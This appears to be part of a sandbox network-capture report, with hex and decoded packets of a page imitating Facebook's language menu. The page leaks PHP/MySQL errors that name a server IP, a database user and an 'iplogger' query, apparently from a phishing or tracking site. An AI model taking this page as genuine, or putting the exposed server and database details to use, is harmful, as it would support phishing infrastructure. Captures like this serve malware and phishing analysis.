2022-10-07 13:59:28 UTC	781	IN	Data Raw: 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 Data Ascii: 53C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u
2022-10-07 13:59:28 UTC	782	IN	Data Raw: 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 Data Ascii: 520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250
2022-10-07 13:59:28 UTC	784	IN	Data Raw: 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c Data Ascii: 0user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall
2022-10-07 13:59:28 UTC	785	IN	Data Raw: 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 Data Ascii: 00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resour
2022-10-07 13:59:28 UTC	787	IN	Data Raw: 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 Data Ascii: E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3C
2022-10-07 13:59:28 UTC	788	IN	Data Raw: 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c Data Ascii: ed\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\
2022-10-07 13:59:28 UTC	790	IN	Data Raw: 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 Data Ascii: 0253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogg
2022-10-07 13:59:28 UTC	791	IN	Data Raw: 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 Data Ascii: 3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A
2022-10-07 13:59:28 UTC	793	IN	Data Raw: 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 Data Ascii: 0253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/s
2022-10-07 13:59:28 UTC	794	IN	Data Raw: 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 Data Ascii: 53C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 6); return false;" title="Turkish">Trke</a></li><li><a
2022-10-07 13:59:28 UTC	796	IN	Data Raw: 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 Data Ascii: Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_US", &q
2022-10-07 13:59:28 UTC	797	IN	Data Raw: 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 20to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A
2022-10-07 13:59:28 UTC	799	IN	Data Raw: 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 Data Ascii: abase.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www
2022-10-07 13:59:28 UTC	800	IN	Data Raw: 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 Data Ascii: u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr
2022-10-07 13:59:28 UTC	802	IN	Data Raw: 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 0253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A
2022-10-07 13:59:28 UTC	803	IN	Data Raw: 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 Data Ascii: %3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%
2022-10-07 13:59:28 UTC	803	IN	Data Raw: 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 Data Ascii: 00%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("zh_CN", "en_US", "https:\/\/zh-cn.facebook.com\/\u00253Cbr\u002520\/\u0025
2022-10-07 13:59:28 UTC	805	IN	Data Raw: 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f Data Ascii: u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520colo
2022-10-07 13:59:28 UTC	806	IN	Data Raw: 33 41 25 32 35 32 30 75 73 65 25 32 35 32 30 6d 79 73 71 6c 69 25 32 35 32 30 6f 72 25 32 35 32 30 50 44 4f 25 32 35 32 30 69 6e 73 74 65 61 64 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 Data Ascii: 3A%2520use%2520mysqli%2520or%2520PDO%2520instead%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%253E
2022-10-07 13:59:28 UTC	808	IN	Data Raw: 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 66 6f 6e 74 25 32 35 33 45 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 32 63 66 61 37 64 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 Data Ascii: l%253E%250A%253Cbr%253E%250A%253Cbr%253E%250A%253C%2Fb%253E%250A%253C%2Ffont%253E&source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageF
